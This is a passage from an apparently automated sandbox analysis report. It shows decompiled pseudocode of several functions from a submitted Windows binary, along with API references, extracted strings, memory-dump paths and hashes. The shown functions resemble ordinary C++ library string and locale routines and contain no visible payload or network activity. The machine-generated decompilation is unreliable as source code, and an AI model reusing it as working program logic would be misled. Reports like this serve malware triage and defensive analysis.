						 *(_t378 - 0x50) = 0x6d;
						 *(_t378 - 0x54) = 0;
						while(1) {
							_t198 = E00417E20( *((intOrPtr*)(_t378 - 0x64)) + 0x124);
							__eflags =  *(_t378 - 0x54) - _t198;
							if( *(_t378 - 0x54) >= _t198) {
								goto L46;
							}
							 *(_t378 - 0x94) =  *(_t378 - 0x50);
							_t374 = E00417E40(_t378 - 0x1c,  *(_t378 - 0x94));
							_t205 = E00417E40( *((intOrPtr*)(_t378 - 0x64)) + 0x124,  *(_t378 - 0x54));
							 *_t374 =  *_t205;
							 *((intOrPtr*)(_t374 + 4)) =  *((intOrPtr*)(_t205 + 4));
							 *(_t378 - 0x50) =  *(_t378 - 0x50) + 1;
							 *(_t378 - 0x9c) =  *(_t378 - 0x50);
							 *((intOrPtr*)(_t378 - 0x98)) = 0;
							 *((intOrPtr*)(_t378 - 0xa0)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
							_t334 =  *((intOrPtr*)(_t378 - 0xa0));
							__eflags =  *(_t378 - 0x9c) -  *((intOrPtr*)(_t334 + 0x18));
							if( *(_t378 - 0x9c) !=  *((intOrPtr*)(_t334 + 0x18))) {
								L45:
								_t275 =  *(_t378 - 0x54) + 1;
								__eflags = _t275;
								 *(_t378 - 0x54) = _t275;
								continue;
							} else {
								_t276 =  *((intOrPtr*)(_t378 - 0xa0));
								__eflags =  *((intOrPtr*)(_t378 - 0x98)) -  *((intOrPtr*)(_t276 + 0x1c));
								if( *((intOrPtr*)(_t378 - 0x98)) !=  *((intOrPtr*)(_t276 + 0x1c))) {
									goto L45;
								} else {
								}
							}
							goto L46;
						}
					} else {
						E00417F80( *((intOrPtr*)(_t378 - 0x64)) + 0x114, _t388);
						E00417F80( *((intOrPtr*)(_t378 - 0x64)) + 0x124, _t388);
						 *((intOrPtr*)(_t378 - 0x74)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
						if( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x74)) + 0x1c)) > 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x74)) + 0x18)) > 0x6d) {
							 *((intOrPtr*)(_t378 - 0x78)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
							if( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x78)) + 0x4c)) > 0) {
								L14:
								_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc)))));
								_t214 = E0040E131( *((intOrPtr*)(_t378 - 0x64)), _t368, _t372, _t392);
								_t382 = _t380 + 4;
								 *((intOrPtr*)(_t378 - 0x58)) = _t214;
								 *((intOrPtr*)(_t378 - 0x24)) =  *((intOrPtr*)(_t378 - 0x58));
								 *(_t378 - 0x34) = 0x6d;
								 *(_t378 - 0x30) = 0;
								 *(_t378 - 0x2c) = 0;
								 *(_t378 - 0x28) = 0;
								 *(_t378 - 0x44) = 0;
								 *(_t378 - 0x40) = 0;
								while(1) {
									 *((intOrPtr*)(_t378 - 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
									_t393 =  *(_t378 - 0x40) -  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x7c)) + 0x4c));
									if(_t393 > 0 || _t393 >= 0 &&  *(_t378 - 0x44) >=  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x7c)) + 0x48))) {
										break;
									}
									_t395 =  *(_t378 - 0x44) |  *(_t378 - 0x40);
									if(( *(_t378 - 0x44) |  *(_t378 - 0x40)) != 0) {
										asm("sbb edx, 0x0");
										 *(_t378 - 0x34) =  *(_t378 - 0x34) - 1;
										_t222 = E00417E40(_t378 - 0x1c,  *(_t378 - 0x34));
										 *((intOrPtr*)(_t378 - 0x3c)) =  *_t222;
										 *((intOrPtr*)(_t378 - 0x38)) =  *((intOrPtr*)(_t222 + 4));
										_t224 =  *(_t378 - 0x2c) - 1;
										__eflags = _t224;
										asm("sbb ecx, 0x0");
										 *(_t378 - 0x2c) = _t224;
									} else {
										_t321 =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
										 *((intOrPtr*)(_t378 - 0x3c)) =  *((intOrPtr*)(_t321 + 0x40));
										 *((intOrPtr*)(_t378 - 0x38)) =  *((intOrPtr*)(_t321 + 0x44));
									}
									E00417E60( *((intOrPtr*)(_t378 - 0x64)) + 0x114, _t378 - 0x3c);
									_t226 = E00417E20( *((intOrPtr*)(_t378 - 0x64)) + 0x114);
									E00417D50( *((intOrPtr*)(_t378 - 0x64)) + 0x124, _t395, E00423BC0(_t226, 0, E00427900( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc)) + 4)), 4, 0),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc)) + 4))));
									E00415C30( *((intOrPtr*)(_t378 - 0x64)), 0, _t226,  *((intOrPtr*)(_t378 - 0x3c)),  *((intOrPtr*)(_t378 - 0x38)),  *((intOrPtr*)(_t378 - 0x24)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc)) + 4)));
									 *(_t378 - 0x4c) = 0;
									 *(_t378 - 0x48) = 0;
									while(1) {
										 *((intOrPtr*)(_t378 - 0x80)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xfc));
										_t396 =  *(_t378 - 0x48) -  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x80)) + 4));
										if(_t396 > 0 || _t396 >= 0 &&  *(_t378 - 0x4c) >=  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x80))))) {
											break;
										}
										 *((intOrPtr*)(_t378 - 0x84)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
										_t398 =  *(_t378 - 0x30) -  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x84)) + 0x1c));
										if(_t398 < 0 || _t398 <= 0 &&  *(_t378 - 0x34) <  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x84)) + 0x18))) {
											_t239 = E00413060( *(_t378 - 0x4c) +  *((intOrPtr*)(_t378 - 0x24)));
											_t382 = _t382 + 4;
											_t240 = E00417E40(_t378 - 0x1c,  *(_t378 - 0x34));
											 *_t240 = _t239;
											 *((intOrPtr*)(_t240 + 4)) = 0;
											 *(_t378 - 0x88) =  *(_t378 - 0x2c);
											_t377 = E00417E40( *((intOrPtr*)(_t378 - 0x64)) + 0x124,  *(_t378 - 0x88));
											_t243 = E00417E40(_t378 - 0x1c,  *(_t378 - 0x34));
											 *_t377 =  *_t243;
											 *((intOrPtr*)(_t377 + 4)) =  *((intOrPtr*)(_t243 + 4));
											asm("adc ecx, 0x0");
											 *(_t378 - 0x2c) =  *(_t378 - 0x2c) + 1;
											_t358 =  *(_t378 - 0x34) + 1;
											__eflags = _t358;
											asm("adc eax, 0x0");
											 *(_t378 - 0x34) = _t358;
											_t360 =  *(_t378 - 0x4c) + 4;
											__eflags = _t360;
											asm("adc eax, 0x0");
											 *(_t378 - 0x4c) = _t360;
											continue;
										} else {
										}
										break;
									}
									asm("adc ecx, 0x0");
									 *(_t378 - 0x44) =  *(_t378 - 0x44) + 1;
								}
								 *((intOrPtr*)(_t378 - 0x90)) = E00417E20( *((intOrPtr*)(_t378 - 0x64)) + 0x124);
								 *((intOrPtr*)(_t378 - 0x8c)) = 0;
								__eflags =  *((intOrPtr*)(_t378 - 0x90)) -  *(_t378 - 0x2c);
								if( *((intOrPtr*)(_t378 - 0x90)) !=  *(_t378 - 0x2c)) {
									L36:
									__eflags =  *((intOrPtr*)(_t378 - 0x64)) + 0x124;
									E00417D50( *((intOrPtr*)(_t378 - 0x64)) + 0x124,  *((intOrPtr*)(_t378 - 0x64)) + 0x124,  *(_t378 - 0x2c));
								} else {
									__eflags =  *((intOrPtr*)(_t378 - 0x8c)) -  *(_t378 - 0x28);
									if( *((intOrPtr*)(_t378 - 0x8c)) !=  *(_t378 - 0x28)) {
										goto L36;
									}
								}
								 *((intOrPtr*)(_t378 - 0x5c)) =  *((intOrPtr*)(_t378 - 0x24));
								_push( *((intOrPtr*)(_t378 - 0x5c)));
								E00422D00();
							} else {
								_t323 =  *((intOrPtr*)(_t378 - 0x78));
								_t392 =  *((intOrPtr*)(_t323 + 0x48));
								if( *((intOrPtr*)(_t323 + 0x48)) > 0) {
									goto L14;
								}
							}
						}
					}
					L46:
					E00417B50( *((intOrPtr*)(_t378 + 8)), _t378 - 0x1c);
					_t263 =  *(_t378 - 0x60) | 0x00000001;
					__eflags = _t263;
					 *(_t378 - 0x60) = _t263;
					 *((char*)(_t378 - 4)) = 0;
					E00417D00(_t378 - 0x1c);
					_t195 = _t378 - 0xc; // 0x414fe3
					 *[fs:0x0] =  *_t195;
					return  *((intOrPtr*)(_t378 + 8));
				}
			}

0x004162af
0x004162af
0x004162d6
0x00416275
0x0041627c
0x0041628c
0x0041628f
0x00416292
0x0041629b
0x0041629e
0x004162b4
0x004162c1
0x004162c6
0x004162cd
0x004162d3
0x00000000
0x00000000
0x004162ad
0x0041629e
0x004162d8
0x004162dc
0x004162de
0x00416602
0x00416609
0x0041661b
0x00416624
0x00416629
0x0041662c
0x00000000
0x00000000
0x00416635
0x0041664a
0x00416659
0x00416660
0x00416665
0x0041666e
0x0041667f
0x00416685
0x0041668b
0x00416691
0x0041669d
0x004166a0
0x004166b5
0x00416615
0x00416615
0x00416618
0x00000000
0x004166a2
0x004166a2
0x004166ae
0x004166b1
0x00000000
0x00000000
0x004166b3
0x004166b1
0x00000000
0x004166a0
0x004162e4
0x004162ed
0x004162fb
0x00416309
0x00416313
0x0041632b
0x00416335
0x00416344
0x0041634f
0x00416350
0x00416355
0x00416358
0x0041635e
0x00416361
0x00416368
0x0041636f
0x00416376
0x0041637d
0x00416384
0x0041639f
0x004163a8
0x004163b1
0x004163b4
0x00000000
0x00000000
0x004163ce
0x004163d1
0x004163f3
0x004163f6
0x00416403
0x0041640a
0x00416410
0x00416416
0x00416416
0x0041641c
0x0041641f
0x004163d3
0x004163d6
0x004163df
0x004163e5
0x004163e5
0x00416432
0x00416440
0x00416475
0x00416499
0x0041649e
0x004164a5
0x004164c0
0x004164c9
0x004164d2
0x004164d5
0x00000000
0x00000000
0x004164f4
0x00416503
0x00416506
0x00416526
0x0041652b
0x00416539
0x0041653e
0x00416540
0x00416546
0x00416561
0x0041656a
0x00416571
0x00416576
0x00416582
0x00416585
0x0041658e
0x0041658e
0x00416594
0x00416597
0x004164b1
0x004164b1
0x004164b7
0x004164ba
0x00000000
0x00000000
0x00416518
0x00000000
0x00416506
0x00416396
0x00416399
0x0041639c
0x004165b7
0x004165bd
0x004165c9
0x004165cc
0x004165d9
0x004165e0
0x004165e6
0x004165ce
0x004165d4
0x004165d7
0x00000000
0x00000000
0x004165d7
0x004165ee
0x004165f4
0x004165f5
0x00416337
0x00416337
0x0041633a
0x0041633e
0x00000000
0x00000000
0x0041633e
0x00416335
0x004165fd
0x004166ba
0x004166c1
0x004166c9
0x004166c9
0x004166cc
0x004166cf
0x004166d6
0x004166de
0x004166e1
0x004166ed
0x004166ed

APIs

__aulldiv.LIBCMT ref: 0041645D

Strings

m, xrefs: 00416278
m, xrefs: 00416361
OA, xrefs: 004162D8

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __aulldiv
String ID: m$m$OA
API String ID: 3732870572-342635961
Opcode ID: 8afcecce9e4f94abb5b1ac54f4524d09e9f3b0c7a0c922a8e20ba0b84e5a6ce9
Instruction ID: b26674ad61194829dfced3f0c41da5099e5cf6fbbc8727bd499e70bb849b67be
Opcode Fuzzy Hash: 8afcecce9e4f94abb5b1ac54f4524d09e9f3b0c7a0c922a8e20ba0b84e5a6ce9
Instruction Fuzzy Hash: 3771E870A00209DFDB18DF95C590AEEB7F2BF88304F25816AE5196B345D739AD82CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F40(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t17;
				intOrPtr* _t19;
				char* _t24;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t45;
				signed int _t50;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr _t61;

				_t61 = _a4;
				_t60 = __ecx;
				if(_t61 == 0) {
					L12:
					_t17 =  *((intOrPtr*)(_t60 + 0x10));
					_t35 = _a8;
					if((_t50 | 0xffffffff) - _t17 <= _t35) {
						_t17 = E0040DF21("string too long");
					}
					if(_t35 == 0) {
						L29:
						return _t60;
					} else {
						_t56 = _t17 + _t35;
						if(_t56 > 0xfffffffe) {
							_t17 = E0040DF21("string too long");
						}
						_t41 =  *((intOrPtr*)(_t60 + 0x14));
						if(_t41 >= _t56) {
							if(_t56 != 0) {
								goto L19;
							} else {
								 *((intOrPtr*)(_t60 + 0x10)) = _t56;
								if(_t41 < 0x10) {
									_t24 = _t60;
									 *_t24 = 0;
									return _t24;
								} else {
									 *((char*)( *_t60)) = 0;
									return _t60;
								}
							}
						} else {
							E00402F60(_t60, _t56, _t17);
							if(_t56 == 0) {
								goto L29;
							} else {
								L19:
								if( *((intOrPtr*)(_t60 + 0x14)) < 0x10) {
									_t19 = _t60;
								} else {
									_t19 =  *_t60;
								}
								E004224A0( *((intOrPtr*)(_t60 + 0x10)) + _t19, _t61, _t35);
								 *((intOrPtr*)(_t60 + 0x10)) = _t56;
								if( *((intOrPtr*)(_t60 + 0x14)) < 0x10) {
									 *((char*)(_t60 + _t56)) = 0;
									goto L29;
								} else {
									 *((char*)( *_t60 + _t56)) = 0;
									return _t60;
								}
							}
						}
					}
				} else {
					_t45 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t45 < 0x10) {
						_t28 = __ecx;
					} else {
						_t28 =  *__ecx;
					}
					if(_t61 < _t28) {
						goto L12;
					} else {
						if(_t45 < 0x10) {
							_t29 = _t60;
						} else {
							_t29 =  *_t60;
						}
						_t50 =  *((intOrPtr*)(_t60 + 0x10)) + _t29;
						if(_t50 <= _t61) {
							goto L12;
						} else {
							if(_t45 < 0x10) {
								return E00403E50(_t60, _t60, _t61 - _t60, _a8);
							} else {
								return E00403E50(_t60, _t60, _t61 -  *_t60, _a8);
							}
						}
					}
				}
			}

0x00403f41
0x00403f46
0x00403f4a
0x00403fa5
0x00403fa5
0x00403fac
0x00403fb4
0x00403fbb
0x00403fbb
0x00403fc3
0x0040404f
0x00404055
0x00403fc9
0x00403fc9
0x00403fcf
0x00403fd6
0x00403fd6
0x00403fdb
0x00403fe0
0x00403ffb
0x00000000
0x00403ffd
0x00403ffd
0x00404003
0x00404015
0x00404018
0x0040401c
0x00404005
0x00404009
0x00404010
0x00404010
0x00404003
0x00403fe2
0x00403fe6
0x00403fed
0x00000000
0x00403fef
0x00403fef
0x00403ff3
0x0040401f
0x00403ff5
0x00403ff5
0x00403ff5
0x00404029
0x00404035
0x00404038
0x0040404b
0x00000000
0x0040403a
0x0040403c
0x00404046
0x00404046
0x00404038
0x00403fed
0x00403fe0
0x00403f4c
0x00403f4c
0x00403f52
0x00403f58
0x00403f54
0x00403f54
0x00403f54
0x00403f5c
0x00000000
0x00403f5e
0x00403f61
0x00403f67
0x00403f63
0x00403f63
0x00403f63
0x00403f6c
0x00403f70
0x00000000
0x00403f72
0x00403f75
0x00403fa2
0x00403f77
0x00403f8b
0x00403f8b
0x00403f75
0x00403f70
0x00403f5c

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403FBB
std::_Xinvalid_argument.LIBCPMT ref: 00403FD6
_memmove.LIBCMT ref: 00404029

Part of subcall function 00403E50: std::_Xinvalid_argument.LIBCPMT ref: 00403E67
Part of subcall function 00403E50: std::_Xinvalid_argument.LIBCPMT ref: 00403E8A
Part of subcall function 00403E50: std::_Xinvalid_argument.LIBCPMT ref: 00403EA5
Part of subcall function 00403E50: _memmove.LIBCMT ref: 00403F06

Strings

string too long, xrefs: 00403FB6, 00403FD1

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: b24ac47130b51f1bf4e789a6308610eff140016e8b48a36028ffeb9668b19652
Instruction ID: ff4ba8499a283cc8db480e2e4198b1d662387b0199c4fe5c65387f3b25645825
Opcode Fuzzy Hash: b24ac47130b51f1bf4e789a6308610eff140016e8b48a36028ffeb9668b19652
Instruction Fuzzy Hash: E03118727003124BD324AE5DE540A2BB7EDEBD6711B10093FF691A77C1C779AC4483A9

Uniqueness

Uniqueness Score: -1.00%

Function 00440CCF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00440CCF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				char _t49;
				intOrPtr _t52;
				intOrPtr _t55;
				short _t63;
				intOrPtr _t70;
				int _t71;
				intOrPtr _t74;
				char _t80;
				void* _t83;
				short _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t87;

				_push(0x3c);
				E00425719(E0044F859, __ebx, __edi, __esi);
				_t70 =  *((intOrPtr*)(_t86 + 0x1c));
				 *(_t86 - 0x24) =  *(_t86 - 0x24) & 0x00000000;
				asm("movsd");
				 *((intOrPtr*)(_t86 - 0x44)) = __ecx;
				 *((intOrPtr*)(_t86 - 0x3c)) =  *((intOrPtr*)(_t86 + 8));
				asm("movsb");
				 *((intOrPtr*)(_t86 - 0x20)) = 0xf;
				 *((char*)(_t86 - 0x34)) = 0;
				_t49 =  *((intOrPtr*)(_t86 + 0x24));
				 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
				if(_t49 != 0) {
					 *((char*)(_t86 - 0x16)) = _t49;
					 *((char*)(_t86 - 0x15)) =  *((intOrPtr*)(_t86 + 0x20));
				} else {
					 *((char*)(_t86 - 0x16)) =  *((intOrPtr*)(_t86 + 0x20));
				}
				 *((intOrPtr*)(_t86 - 0x38)) = 0x10;
				while(1) {
					E00403B10(_t86 - 0x34,  *((intOrPtr*)(_t86 - 0x38)), 0);
					_t80 =  *((intOrPtr*)(_t86 - 0x44));
					_t52 =  *((intOrPtr*)(_t80 + 8));
					_t74 =  *((intOrPtr*)(_t86 - 0x34));
					if( *((intOrPtr*)(_t86 - 0x20)) < 0x10) {
						_t74 = _t86 - 0x34;
					}
					_t83 = E0044D32F(_t74,  *(_t86 - 0x24), _t86 - 0x18, _t70, _t52);
					_t87 = _t87 + 0x14;
					if(_t83 != 0) {
						 *(_t86 - 0x48) =  *(_t86 - 0x48) & 0x00000000;
						_t55 =  *((intOrPtr*)(_t86 - 0x34));
						_t84 = _t83 - 1;
						__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0x10;
						if( *((intOrPtr*)(_t86 - 0x20)) < 0x10) {
							_t55 = _t86 - 0x34;
						}
						_t71 = _t55 + 1;
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t85 =  *((intOrPtr*)(_t86 - 0x3c));
							 *_t85 =  *((intOrPtr*)(_t86 + 0xc));
							 *((intOrPtr*)(_t85 + 4)) =  *((intOrPtr*)(_t86 + 0x10));
							E00402E20(_t86 - 0x34, 1, 0);
							return E00425763(_t71, _t80, _t85);
						} else {
							__eflags = _t80;
							do {
								_t63 = E0040E49C(_t86 - 0x40, _t71, _t84, _t86 - 0x48, _t80);
								_t87 = _t87 + 0x14;
								__eflags = _t63 - 0xfffffffd;
								if(__eflags == 0) {
									_t63 = 0;
									__eflags = 0;
									goto L19;
								}
								if(__eflags <= 0) {
									goto L19;
								}
								__eflags = _t63;
								if(__eflags < 0) {
									goto L20;
								}
								if(__eflags == 0) {
									__eflags =  *((short*)(_t86 - 0x40));
									if( *((short*)(_t86 - 0x40)) == 0) {
										_t63 = E00426630(_t71) + 1;
									}
								}
								L19:
								_t84 = _t84 - _t63;
								_t71 = _t71 + _t63;
								E0043C582(_t86 + 0xc,  *((intOrPtr*)(_t86 - 0x40)));
								__eflags = _t84;
							} while (_t84 != 0);
							goto L20;
						}
					}
					 *((intOrPtr*)(_t86 - 0x38)) =  *((intOrPtr*)(_t86 - 0x38)) +  *((intOrPtr*)(_t86 - 0x38));
				}
			}

0x00440ccf
0x00440cd6
0x00440cde
0x00440ce1
0x00440ced
0x00440cee
0x00440cf1
0x00440cf4
0x00440cf5
0x00440cfc
0x00440d00
0x00440d03
0x00440d09
0x00440d13
0x00440d19
0x00440d0b
0x00440d0e
0x00440d0e
0x00440d1c
0x00440d23
0x00440d2b
0x00440d34
0x00440d37
0x00440d3a
0x00440d3d
0x00440d3f
0x00440d3f
0x00440d51
0x00440d53
0x00440d58
0x00440d64
0x00440d68
0x00440d6b
0x00440d6c
0x00440d70
0x00440d72
0x00440d72
0x00440d75
0x00440d78
0x00440d7a
0x00440dc5
0x00440dc8
0x00440dcb
0x00440dd7
0x00440dda
0x00440de6
0x00440d7c
0x00440d7c
0x00440d7f
0x00440d8a
0x00440d8f
0x00440d92
0x00440d95
0x00440db0
0x00440db0
0x00000000
0x00440db0
0x00440d97
0x00000000
0x00000000
0x00440d99
0x00440d9b
0x00000000
0x00000000
0x00440d9d
0x00440d9f
0x00440da4
0x00440dad
0x00440dad
0x00440da4
0x00440db2
0x00440db8
0x00440dba
0x00440dbc
0x00440dc1
0x00440dc1
0x00000000
0x00440d7f
0x00440d7a
0x00440d5f
0x00440d5f

APIs

__EH_prolog3_GS.LIBCMT ref: 00440CD6
__cftoe.LIBCMT ref: 00440D4C
_strlen.LIBCMT ref: 00440DA7

Strings

!%x, xrefs: 00440CE5

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: H_prolog3___cftoe_strlen
String ID: !%x
API String ID: 2699215026-1893981228
Opcode ID: 6608ac4b084fee0512396c8fceb533e5c4c6a2bb2da4417346b80a46eac59000
Instruction ID: 20c626ce8a787f154a8b73880a5ec88956cfc4c6110e5f678646a9e76a8c782d
Opcode Fuzzy Hash: 6608ac4b084fee0512396c8fceb533e5c4c6a2bb2da4417346b80a46eac59000
Instruction Fuzzy Hash: 10419EB1D01218AFEF11DFE4D840BEEBBB5AF14314F14041AE941B7242D378AE59CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E00414970(intOrPtr __ecx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t62;
				intOrPtr _t96;

				_push(0xffffffff);
				_push(E0044EAFE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				_v48 = __ecx;
				_v8 = 5;
				if(( *(_v48 + 0xe0) & 0x000000ff) != 0) {
					E00415770(_v48, __edi, __esi);
				}
				_v24 =  *((intOrPtr*)(_v48 + 0x100));
				_t9 =  &_v24; // 0x41712f
				_v20 =  *_t9;
				if(_v20 == 0) {
					_v52 = 0;
				} else {
					_v52 = E00414AD0(_v20, 1);
				}
				_v32 =  *((intOrPtr*)(_v48 + 0xfc));
				_v28 = _v32;
				if(_v28 == 0) {
					_v56 = 0;
				} else {
					_v56 = E00414AD0(_v28, 1);
				}
				_v40 =  *((intOrPtr*)(_v48 + 0xf8));
				_v36 = _v40;
				_t102 = _v36;
				if(_v36 == 0) {
					_v60 = 0;
				} else {
					_v60 = E00414B00(_v36, 1);
				}
				_v44 =  *((intOrPtr*)(_v48 + 0xf4));
				_push(_v44);
				E00422493();
				_v8 = 4;
				E004185B0(_v48 + 0x138, _t102);
				_v8 = 3;
				E00417D00(_v48 + 0x124);
				_v8 = 2;
				E00417D00(_v48 + 0x114);
				_v8 = 1;
				E00417D00(_v48 + 0x104);
				_v8 = 0;
				E00414940(_v48 + 0x20);
				_v8 = 0xffffffff;
				_t62 = E004034C0(_v48 + 4);
				 *[fs:0x0] = _v16;
				return _t62;
			}

0x00414973
0x00414975
0x00414980
0x00414981
0x0041498b
0x0041498e
0x004149a1
0x004149a6
0x004149a6
0x004149b4
0x004149b7
0x004149ba
0x004149c1
0x004149d2
0x004149c3
0x004149cd
0x004149cd
0x004149e2
0x004149e8
0x004149ef
0x00414a00
0x004149f1
0x004149fb
0x004149fb
0x00414a10
0x00414a16
0x00414a19
0x00414a1d
0x00414a2e
0x00414a1f
0x00414a29
0x00414a29
0x00414a3e
0x00414a44
0x00414a45
0x00414a4d
0x00414a5a
0x00414a5f
0x00414a6c
0x00414a71
0x00414a7e
0x00414a83
0x00414a90
0x00414a95
0x00414a9f
0x00414aa4
0x00414ab1
0x00414ab9
0x00414ac3

APIs

codecvt.LIBCPMTD ref: 004149C8
codecvt.LIBCPMTD ref: 004149F6
codecvt.LIBCPMTD ref: 00414A24

Strings

/qA, xrefs: 004149B7

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: codecvt
String ID: /qA
API String ID: 3662085145-4222607742
Opcode ID: 0d8f80fa2aa40e1c1d11aca762edcc8da9cfff6ae9cddbdb2b01b02f552c02f9
Instruction ID: 50fef3fae616f10293fd216e3b38f91c6f936fd9510ed5b42f726a4e8c7ba3c0
Opcode Fuzzy Hash: 0d8f80fa2aa40e1c1d11aca762edcc8da9cfff6ae9cddbdb2b01b02f552c02f9
Instruction Fuzzy Hash: 384118B0D04249DFDB08DFA8D591BEEBBB1AF48308F14816ED5127B381C7795980CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BFB0(intOrPtr* __ecx, intOrPtr _a4, char _a8) {
				intOrPtr _t14;
				intOrPtr* _t15;
				char* _t23;
				intOrPtr _t34;
				intOrPtr* _t35;

				_t30 = __ecx;
				_t34 = _a4;
				_t35 = __ecx;
				if(_t34 == 0xffffffff) {
					E0040DF21("string too long");
				}
				if(_t34 > 0xfffffffe) {
					E0040DF21("string too long");
				}
				_t14 =  *((intOrPtr*)(_t35 + 0x14));
				if(_t14 >= _t34) {
					if(_t34 != 0) {
						goto L6;
					} else {
						 *((intOrPtr*)(_t35 + 0x10)) = _t34;
						if(_t14 < 0x10) {
							_t23 = _t35;
							 *_t23 = 0;
							return _t23;
						} else {
							 *((char*)( *_t35)) = 0;
							return _t35;
						}
					}
				} else {
					E00402F60(_t30, _t34,  *((intOrPtr*)(_t35 + 0x10)));
					if(_t34 == 0) {
						L21:
						return _t35;
					} else {
						L6:
						if(_t34 != 1) {
							if( *((intOrPtr*)(_t35 + 0x14)) < 0x10) {
								_t15 = _t35;
							} else {
								_t15 =  *_t35;
							}
							E00422B80(_t15, _a8, _t34);
						} else {
							if( *((intOrPtr*)(_t35 + 0x14)) < 0x10) {
								 *_t35 = _a8;
